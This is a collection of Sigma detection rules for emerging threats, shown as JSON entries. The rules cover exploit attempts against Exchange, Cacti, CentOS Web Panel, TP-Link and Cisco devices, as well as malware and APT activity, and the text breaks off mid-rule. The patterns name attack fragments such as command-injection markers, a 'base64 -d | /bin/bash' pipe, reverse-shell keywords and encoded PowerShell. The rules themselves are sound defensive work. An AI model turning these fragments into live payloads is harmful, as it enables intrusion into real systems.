    "content": "title: Potential KDC RC4-HMAC Downgrade Exploit - CVE-2022-37966\nid: e6f81941-b1cd-4766-87db-9fc156f658ee\nstatus: test\ndescription: Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation\nreferences:\n    - https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-09\nmodified: 2025-11-03\ntags:\n    - attack.privilege-escalation\n    - detection.emerging-threats\n    - cve.2022-37966\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 42\n        Provider_Name:\n            - 'Kerberos-Key-Distribution-Center'\n            - 'Microsoft-Windows-Kerberos-Key-Distribution-Center'\n        Level: 2  # Error\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/proxy_cve_2022_36804_exchange_owassrf_exploitation.yml",
    "content": "title: Potential OWASSRF Exploitation Attempt - Proxy\nid: 1ddf4596-1908-43c9-add2-1d2c2fcc4797\nstatus: test\ndescription: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint.\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'POST'\n        sc-status: 200\n        c-uri|contains|all:\n            - '/owa/'\n            - '/powershell'\n        c-uri|contains:\n            - '@'\n            - '%40'\n    filter_main_ua:\n        c-useragent:\n            - 'ClientInfo'\n            - 'Microsoft WinRM Client'\n            - 'Exchange BackEnd Probes'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/proxy_cve_2022_36804_exchange_owassrf_poc_exploitation.yml",
    "content": "title: OWASSRF Exploitation Attempt Using Public POC - Proxy\nid: fdd7e904-7304-4616-a46a-e32f917c4be4\nstatus: test\ndescription: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using a publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint.\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\n    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        # Look for the header: X-OWA-ExplicitLogonUser: owa/mastermailbox@outlook.com\n        c-useragent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'\n        cs-method: 'POST'\n        sc-status: 200\n        c-uri|contains|all:\n            - '/owa/mastermailbox'\n            - '/powershell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/web_cve_2022_36804_exchange_owassrf_exploitation.yml",
    "content": "title: Potential OWASSRF Exploitation Attempt - Webserver\nid: 181f49fa-0b21-4665-a98c-a57025ebb8c7\nstatus: test\ndescription: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint.\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        sc-status: 200\n        cs-uri-query|contains|all:\n            - '/owa/'\n            - '/powershell'\n        cs-uri-query|contains:\n            - '@'\n            - '%40'\n    filter_main_ua:\n        cs-user-agent:\n            - 'ClientInfo'\n            - 'Microsoft WinRM Client'\n            - 'Exchange BackEnd Probes'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/web_cve_2022_36804_exchange_owassrf_poc_exploitation.yml",
    "content": "title: OWASSRF Exploitation Attempt Using Public POC - Webserver\nid: 92d78c63-5a5c-4c40-9b60-463810ffb082\nstatus: test\ndescription: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using a publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint.\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\n    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        # Look for the header: X-OWA-ExplicitLogonUser: owa/mastermailbox@outlook.com\n        cs-user-agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'\n        cs-method: 'POST'\n        sc-status: 200\n        cs-uri-query|contains|all:\n            - '/owa/mastermailbox'\n            - '/powershell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml",
    "content": "title: Suspicious Sysmon as Execution Parent\nid: 6d1058a4-407e-4f3a-a144-1968c11dc5c3\nstatus: test\ndescription: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120\n    - https://twitter.com/filip_dragovic/status/1590052248260055041\n    - https://twitter.com/filip_dragovic/status/1590104354727436290\nauthor: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)\ndate: 2022-11-10\nmodified: 2025-07-04\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2022-41120\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\Sysmon.exe'\n            - '\\Sysmon64.exe'\n    filter_main_temp_sysmon:\n        # C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\Sysmon.exe\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n        Image|endswith:\n            - '\\Sysmon.exe'\n            - '\\Sysmon64.exe'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Windows\\Sysmon.exe'\n            - ':\\Windows\\Sysmon64.exe'\n            - ':\\Windows\\System32\\conhost.exe'\n            - ':\\Windows\\System32\\WerFault.exe' # When Sysmon crashes\n            - ':\\Windows\\System32\\WerFaultSecure.exe' # When Sysmon crashes\n            - ':\\Windows\\System32\\wevtutil.exe'\n            - ':\\Windows\\SysWOW64\\wevtutil.exe'\n    filter_main_null:\n        Image: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-42475/fortios_sslvpnd_exploit_cve_2022_42475_exploitation_indicators.yml",
    "content": "title: Exploitation Indicator Of CVE-2022-42475\nid: 293ccb8c-bed8-4868-8296-bef30e303b7e\nstatus: test\ndescription: Detects exploitation indicators of CVE-2022-42475, a heap-based buffer overflow in sslvpnd.\nreferences:\n    - https://www.fortiguard.com/psirt/FG-IR-22-398\n    - https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/\n    - https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/\n    - https://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420\nauthor: Nasreddine Bencherchali (Nextron Systems), Nilaa Maharjan, Douglasrose75\ndate: 2024-02-08\ntags:\n    - attack.initial-access\n    - cve.2022-42475\n    - detection.emerging-threats\nlogsource:\n    product: fortios\n    service: sslvpnd\n    definition: 'Requirements: file creation events or equivalent must be collected from the FortiOS SSL-VPN appliance in order for this detection to function correctly'\ndetection:\n    keywords:\n        - '/data/etc/wxd.conf'\n        - '/data/lib/libgif.so'\n        - '/data/lib/libips.bak'\n        - '/data/lib/libiptcp.so'\n        - '/data/lib/libipudp.so'\n        - '/data/lib/libjepg.so'\n        - '/var/.sslvpnconfigbk'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-44877/web_cve_2022_44877_exploitation_attempt.yml",
    "content": "title: Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877\nid: 1b2eeb27-949b-4704-8bfa-d8e5cfa045a1\nstatus: test\ndescription: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877\nreferences:\n    - https://seclists.org/fulldisclosure/2023/Jan/1\n    - https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-44877\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/login/index.php'\n            - 'login='\n        cs-uri-query|contains:\n            # TODO: Include other commonly used reverse shells. Examples: https://www.revshells.com/\n            - 'login=$('\n            # Common keywords related to Python reverse shells\n            - 'base64'\n            - 'subprocess'\n            - 'socket'\n            - '${IFS}' # Usage of the internal field separator to avoid writing spaces\n            # Base64-encoded \"python\" at the three possible offsets\n            - 'cHl0aG9u'\n            - 'B5dGhvb'\n            - 'weXRob2'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-46169/web_cve_2022_46169_cacti_exploitation_attempt.yml",
    "content": "title: Potential CVE-2022-46169 Exploitation Attempt\nid: 738cb115-881f-4df3-82cc-56ab02fc5192\nstatus: test\ndescription: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169\nreferences:\n    - https://github.com/0xf4n9x/CVE-2022-46169\n    - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf\n    - https://github.com/rapid7/metasploit-framework/pull/17407\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-27\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-46169\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        # Check for the presence of the X-FORWARDED-FOR header pointing to the hostname of the server running Cacti (which indicates an auth bypass)\n        # Check for previous requests indicating brute forcing of the \"local_data_ids\" and \"host_id\" parameters\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/remote_agent.php'\n            - 'action=polldata'\n            - 'poller_id='\n        cs-uri-query|contains:\n            # From https://github.com/rapid7/metasploit-framework/pull/17407/files#diff-972a47250ccd30b935a59e8871134956a15980df5b29f9d970414646704d5258R288\n            # Not tested; the payload could appear in other formats (update if you have more info)\n            - '| base64 -d | /bin/bash`'\n            - '%7C%20base64%20-d%20%7C%20%2Fbin%2Fbash%60' # URL encoded version\n            # Add more suspicious commands accordingly\n            - '`whoami'\n            - 'powershell'\n            - 'cmd'\n            - 'wget'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml",
    "content": "title: BlueSky Ransomware Artefacts\nid: eee8311f-a752-44f0-bf2f-6b007db16300\nstatus: test\ndescription: Detects access to files and shares with names and extensions used by BlueSky ransomware, which could indicate a current or previous encryption attempt.\nreferences:\n    - https://unit42.paloaltonetworks.com/bluesky-ransomware/\nauthor: j4son\ndate: 2023-05-23\ntags:\n    - attack.impact\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_access_eid:\n        EventID:\n            - 4663\n            - 4656\n    selection_access_data:\n        - ObjectName|endswith: '.bluesky'\n        - ObjectName|contains: 'DECRYPT FILES BLUESKY'\n    selection_share_eid:\n        EventID: 5145\n    selection_share_data:\n        - RelativeTargetName|endswith: '.bluesky'\n        - RelativeTargetName|contains: 'DECRYPT FILES BLUESKY'\n    condition: all of selection_access_* or all of selection_share_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Bumblebee/create_remote_thread_win_malware_bumblebee.yml",
    "content": "title: Potential Bumblebee Remote Thread Creation\nid: 994cac2b-92c2-44bf-8853-14f6ca39fbda\nstatus: test\ndescription: Detects remote thread injection events based on actions seen used by Bumblebee\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\wabmig.exe'\n            - '\\wab.exe'\n            - '\\ImagingDevices.exe'\n        TargetImage|endswith: '\\rundll32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/ChromeLoader/proc_creation_win_malware_chrome_loader_execution.yml",
    "content": "title: ChromeLoader Malware Execution\nid: 0a74c5a9-1b71-4475-9af2-7829d320d5c2\nstatus: test\ndescription: Detects execution of ChromeLoader malware via a registered scheduled task\nreferences:\n    - https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\n    - https://twitter.com/th3_protoCOL/status/1480621526764322817\n    - https://twitter.com/Kostastsale/status/1480716528421011458\n    - https://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd\nauthor: '@kostastsale'\ndate: 2022-01-10\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\n    - attack.t1176\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\powershell.exe'\n        ParentCommandLine|contains: '-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB'\n        CommandLine|contains: '--load-extension=\"*\\Appdata\\local\\chrome\"'\n        Image|endswith: '\\chrome.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Emotet/proc_creation_win_malware_emotet_loader_execution.yml",
    "content": "title: Emotet Loader Execution Via .LNK File\nid: 1f32d820-1d5c-43fe-8fe2-feef0c952eb7\nstatus: test\ndescription: |\n    Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.\n    The \".lnk\" file was delivered via phishing campaign.\nreferences:\n    - https://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338\n    - https://twitter.com/Cryptolaemus1/status/1517634855940632576\n    - https://tria.ge/220422-1pw1pscfdl/\n    - https://tria.ge/220422-1nnmyagdf2/\nauthor: '@kostastsale'\ndate: 2022-04-22\nmodified: 2024-08-15\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\explorer.exe'\n            - '\\powershell.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n        CommandLine|contains|all:\n            - 'findstr'\n            - '.vbs'\n            - '.lnk'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml",
    "content": "title: Hermetic Wiper TG Process Patterns\nid: 2f974656-6d83-4059-bbdf-68ac5403422f\nstatus: test\ndescription: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\nmodified: 2022-09-09\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1021.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\policydefinitions\\postgresql.exe'\n    selection2:\n        - CommandLine|contains:\n              - 'CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp'\n              - ' 1> \\\\\\\\127.0.0.1\\ADMIN$\\__16'\n        - CommandLine|contains|all:\n              - 'powershell -c '\n              - '\\comsvcs.dll MiniDump '\n              - '\\winupd.log full'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_execution.yml",
    "content": "title: Raspberry Robin Subsequent Execution of Commands\nid: d52d2e87-eb03-4fac-961d-eb616da79788\nrelated:\n    - id: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a\n      type: similar\nstatus: test\ndescription: Detects raspberry robin subsequent execution of commands.\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\nauthor: '@kostastsale'\ndate: 2022-05-06\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\fodhelper.exe'\n        Image|endswith:\n            - '\\rundll32.exe'\n            - '\\regsvr32.exe'\n        CommandLine|contains|all:\n            - 'odbcconf.exe'\n            - 'regsvr'\n            - 'shellexec_rundll'\n        CommandLine|contains:\n            - 'installdriver'\n            - 'setfiledsndir'\n            - 'vkipdse'\n        CommandLine|endswith|windash:\n            - '/a'\n            - '/f'\n            - '/s'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_external_drive_exec.yml",
    "content": "title: Raspberry Robin Initial Execution From External Drive\nid: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a\nrelated:\n    - id: d52d2e87-eb03-4fac-961d-eb616da79788\n      type: similar\nstatus: test\ndescription: Detects the initial execution of the Raspberry Robin malware from an external drive using \"Cmd.EXE\".\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\nauthor: '@kostastsale'\ndate: 2022-05-06\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\cmd.exe'\n        ParentCommandLine|contains: '/r'\n        ParentCommandLine|endswith:\n            - '.bin'\n            - '.ico'\n            - '.lnk'\n            - '.lo'\n            - '.sv'\n            - '.usb'\n    selection_child_img:\n        Image|endswith: '\\msiexec.exe'\n        CommandLine|contains|windash: '/q'\n    selection_child_http:\n        CommandLine|contains:\n            - 'http:'\n            - 'https:'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml",
    "content": "title: Potential Raspberry Robin Dot Ending File\nid: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a\nstatus: test\ndescription: Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin\nauthor: Nasreddine Bencherchali (Nextron Systems)\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\ndate: 2022-10-28\nmodified: 2023-02-05\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png\n        # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png\n        # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png\n        CommandLine|re: \\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}  # cannot match on end-of-line because of FPs with bind DNS notation\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/Serpent-Backdoor/proc_creation_win_malware_serpent_backdoor_payload_execution.yml",
    "content": "title: Serpent Backdoor Payload Execution Via Scheduled Task\nid: d5eb7432-fda4-4bba-a37f-ffa74d9ed639\nstatus: test\ndescription: |\n    Detects post exploitation execution technique of the Serpent backdoor.\n    According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.\n    It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.\nreferences:\n    - https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\nauthor: '@kostastsale'\ndate: 2022-03-21\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.006\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n        CommandLine|contains|all:\n            - '[System/EventID='\n            - '/create'\n            - '/delete'\n            - '/ec'\n            - '/so'\n            - '/tn run'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/SocGholish/proc_creation_win_malware_socgholish_fakeupdates_activity.yml",
    "content": "title: FakeUpdates/SocGholish Activity\nid: 97805087-93ab-4203-b5cb-287cda6aecaa\nstatus: test\ndescription: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.\nreferences:\n    - https://twitter.com/th3_protoCOL/status/1536788652889497600\n    - https://twitter.com/1ZRR4H/status/1537501582727778304\nauthor: '@kostastsale'\ndate: 2022-06-16\nmodified: 2024-08-23\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wscript.exe'\n        ParentCommandLine|contains|all:\n            - '\\AppData\\Local\\Temp'\n            - '.zip'\n            - 'update'\n            - '.js'\n        ParentCommandLine|contains:\n            - 'Chrome'\n            - 'Edge'\n            - 'Firefox'\n            - 'Opera'\n            - 'Brave' # Not seen in campaigns\n            - 'Vivaldi' # Not seen in campaigns\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Malware/win_mssql_sp_maggie.yml",
    "content": "title: MSSQL Extended Stored Procedure Backdoor Maggie\nid: 711ab2fe-c9ba-4746-8840-5228a58c3cb8\nstatus: test\ndescription: This rule detects the execution of the extended stored procedure backdoor named Maggie in the context of Microsoft SQL server\nreferences:\n    - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01\nauthor: Denis Szadkowski, DIRT / DCSO CyTec\ndate: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'MSSQLSERVER'\n        EventID: 8128\n        Message|contains: 'maggie'\n    condition: selection\nfalsepositives:\n    - Legitimate extended stored procedures named maggie\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml",
    "content": "title: Potential ACTINIUM Persistence Activity\nid: e1118a8f-82f5-44b3-bb6b-8a284e5df602\nstatus: test\ndescription: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2022-02-07\nmodified: 2023-03-18\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'schtasks'\n            - 'create'\n            - 'wscript'\n            - ' /e:vbscript'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml",
    "content": "title: MERCURY APT Activity\nid: a62298a3-1fe0-422f-9a68-ffbcbc5a123d\nstatus: test\ndescription: Detects suspicious command line patterns seen being used by MERCURY APT\nreferences:\n    - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-26\nmodified: 2023-03-10\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.g0069\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-exec bypass -w 1 -enc'\n            - 'UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA'  # Start-Job -ScriptBlock\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-1389/proxy_exploit_cve_2023_1389_unauth_command_injection_tplink_archer_ax21.yml",
    "content": "title: CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21\nid: 6c7defa9-69f8-4c34-b815-41fce3931754\nstatus: test\ndescription: |\n    Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.\nreferences:\n    - https://www.tenable.com/security/research/tra-2023-11\n    - https://github.com/Voyag3r-Security/CVE-2023-1389/blob/4ecada7335b17bf543c0e33b2c9fb6b6215c09ae/archer-rev-shell.py\n    - https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal\nauthor: Nasreddine Bencherchali (Nextron Systems), Rohit Jain\ndate: 2024-06-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-1389\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection_uri:\n        cs-method:\n            - 'GET'\n            - 'POST'\n        cs-uri|contains|all:\n            - '/cgi-bin/luci/;stok=/locale'\n            - 'form=country'\n    selection_keyword:\n        - 'operation=write'\n        - 'country=$('\n    condition: all of selection_*\nfalsepositives:\n    - Vulnerability Scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-20198/cisco_syslog_cve_2023_20198_ios_xe_web_ui.yml",
    "content": "title: Exploitation Indicators Of CVE-2023-20198\nid: 2ece8816-b7a0-4d9b-b0e8-ae7ad18bc02b\nstatus: test\ndescription: Detects exploitation indicators of CVE-2023-20198, a privilege escalation vulnerability in Cisco IOS XE Software Web UI.\nreferences:\n    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z\n    - https://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/\nauthor: Lars B. P. Frydenskov (Trifork Security)\ndate: 2023-10-20\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - detection.emerging-threats\nlogsource:\n    product: cisco\n    service: syslog\n    definition: 'Requirements: Cisco IOS XE system logs need to be configured and ingested'\ndetection:\n    keyword_event:\n        - '%WEBUI-6-INSTALL_OPERATION_INFO:'\n        - '%SYS-5-CONFIG_P:'\n        - '%SEC_LOGIN-5-WEBLOGIN_SUCCESS:'\n    keyword_user:\n        - 'cisco_tac_admin'\n        